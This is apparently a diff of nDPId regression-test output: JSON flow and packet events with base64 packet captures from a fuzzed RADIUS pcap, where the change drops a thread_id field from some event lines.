00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1528997655006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997655006,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA5NAAPwRJQAlABk+CgxAHgcUchAAzVdGC1wAxX62GNWdpucNZiYPcJ1Tw+4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyamE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEF+QC\/pRrW1P2OBIB77PLtyYRYAgUAAKO0Q86taQAA4Eb2Dn1+Ei2LAQACCwUAANEKc5kzaUyUHJ2asC+h4v1QEoNkNdC6vGAIe51fKjW9k5g="} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1528997655006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997655006,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA5NAAPwRJQAlABk+CgxAHgcUchAAzVdGC1wAxX62GNWdpucNZiYPcJ1Tw+4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyamE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEF+QC\/pRrW1P2OBIB77PLtyYRYAgUAAKO0Q86taQAA4Eb2Dn1+Ei2LAQACCwUAANEKc5kzaUyUHJ2asC+h4v1QEoNkNdC6vGAIe51fKjW9k5g="}
00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01270{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997655006,"pkt":"AAAMB6xAABRP+4rqCABFAALHnfCWAP8RAAAKDEAexuIZPnIQBxQCswAAAV0Cq2pJZM0ruVNMnb6INz7DlDAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFd2CQlXSVNQUjEwGgkQADghDQM1NwZbIqcXATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceUTAwLWE3KjQyLWQwLWUwQDAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6MjA6ZDE6N2Q6MzcvMjI4JAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADLaWk9Y3GhxCUALFVq30f3AwIAIPJ2\/3EaFAAAV8gHDlZaV0MyVGVzdEzhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x4bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQXOelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZBbHVlGh0AADghExc0MC44MDQ4ODJOLTc2LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW26aXJlY3QaDAAABYMHBsB8SplQEpV0+y2O0IA5getcDb\/AJ1c="} 01256{"packet_event_id":1,"packet_event_name":"packet","packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997655006,"pkt":"AAAMB6xAABRP+4rqCABFAALHnfCWAP8RAAAKDEAexuIZPnIQBxQCswAAAV0Cq2pJZM0ruVNMnb6INz7DlDAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFd2CQlXSVNQUjEwGgkQADghDQM1NwZbIqcXATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceUTAwLWE3KjQyLWQwLWUwQDAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6MjA6ZDE6N2Q6MzcvMjI4JAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADLaWk9Y3GhxCUALFVq30f3AwIAIPJ2\/3EaFAAAV8gHDlZaV0MyVGVzdEzhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x4bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQXOelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZBbHVlGh0AADghExc0MC44MDQ4ODJOLTc2LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW26aXJlY3QaDAAABYMHBsB8SplQEpV0+y2O0IA5getcDb\/AJ1c="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997655347} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997655347}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1528997655528,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997655528,"pkt":"ABRP+4rqcNuYZMUnCABFAAEwA5xAAPwRT9bG4hk+CgwlAAcUchB0HNn2Al0BFJBXpcO19tza8j\/VlLjh3P0aCwAAV8gbBVNQQxpuAAABNxA0jONf4TbIHPUvuy933g6GTJqzqlfKJTFZvtaM0NBQo2jkN\/g2tPEp73PKTNfSnSD8j7kRNPVhPusRHPLIHahhhZlLWh2egFea0oaNGerpaQMfhEQ5jMYg8ICzMJVYCSspbKc8\/fk7ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIjViMjJhNzE2L2YwOjc5OjYwOmQxOjclADM3LzIyOFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIwdD70xCUAoHuVXO\/FXR+q"} 00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1528997655528,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997655528,"pkt":"ABRP+4rqcNuYZMUnCABFAAEwA5xAAPwRT9bG4hk+CgwlAAcUchB0HNn2Al0BFJBXpcO19tza8j\/VlLjh3P0aCwAAV8gbBVNQQxpuAAABNxA0jONf4TbIHPUvuy933g6GTJqzqlfKJTFZvtaM0NBQo2jkN\/g2tPEp73PKTNfSnSD8j7kRNPVhPusRHPLIHahhhZlLWh2egFea0oaNGerpaQMfhEQ5jMYg8ICzMJVYCSspbKc8\/fk7ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIjViMjJhNzE2L2YwOjc5OjYwOmQxOjclADM3LzIyOFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIwdD70xCUAoHuVXO\/FXR+q"}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -227,10 +227,10 @@
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1528997663992,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1528997663992,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3}
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1528997663992,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997663992,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA8JAAPuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1528997663992,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997663992,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA8JAAPuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997664564,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997664564,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00725{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997664564,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwJQBAOfwRT6vG4hk1CgxAHgcUchABHPYEAmEBFD8mC375vqLp+KF9uwm3k4gaCwAAV8gbBVNQQxpuAAABNxA07wUYi7+P\/KZsVS9NJaMwCtVJk9jEkC3Vl7jOtDBnuTtoap5IYaKcg6eQ4RJKJBTY9DYRNNB+ybyX+uSA4d1O4JYyTwpoEtUi2e6DQEAJ+nzQSzAvvoa2HSAJtTQFSW0rq69l6fpVATUwMzExNDgwMDcTwDM4MDcyQHdsYW4ubW5jNDjSLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNzE2L2YwOjc5OjYwOmQxOjdkOjM3LzIyOFkMOTA4JQAhMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTXIMaNTnLNgc2lqiL9H7Q"} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997664564,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwJQBAOfwRT6vG4hk1CgxAHgcUchABHPYEAmEBFD8mC375vqLp+KF9uwm3k4gaCwAAV8gbBVNQQxpuAAABNxA07wUYi7+P\/KZsVS9NJaMwCtVJk9jEkC3Vl7jOtDBnuTtoap5IYaKcg6eQ4RJKJBTY9DYRNNB+ybyX+uSA4d1O4JYyTwpoEtUi2e6DQEAJ+nzQSzAvvoa2HSAJtTQFSW0rq69l6fpVATUwMzExNDgwMDcTwDM4MDcyQHdsYW4ubW5jNDjSLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNzE2L2YwOjc5OjYwOmQxOjdkOjM3LzIyOFkMOTA4JQAhMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTXIMaNTnLNgc2lqiL9H7Q"}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997664794} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997664794}
01296{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997664564,"pkt":"AAAMB6xAABRP+4rqCABRAALbIRRAAP8RAAAKDEAexuIZNXIQBxQCxwAAAWICv9GcOA+HA3ZCcU+zBYarldEaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXMlNQUjEwGgkAADghDQM4NwZbIqczATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUyLTAwOlZlchR6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJAzdhdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMlE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNMcHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3Rhqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997664564,"pkt":"AAAMB6xAABRP+4rqCABRAALbIRRAAP8RAAAKDEAexuIZNXIQBxQCxwAAAWICv9GcOA+HA3ZCcU+zBYarldEaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXMlNQUjEwGgkAADghDQM4NwZbIqczATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUyLTAwOlZlchR6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJAzdhdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMlE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNMcHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3Rhqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997683254} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997683254}
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1528997683490,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997683490,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA\/1AAPsRUM3G4hk1CgysngcUchAAzV+4C2IAxbjeL+gJ\/Z8y3pAVBW+ilI8BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrTG9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6UjE6NyUAMzcvMjI4T0oBAgBIFwEAAAEFAACeTPrzq4G+qMdV63zS5jgKAgUAANMitQR5aAAATi\/4eqBv42KLAQBzCwUAAI3Vpdgp79asxAN0pnzOl99QEuFioroE6q1umxIDXtaj55s="} 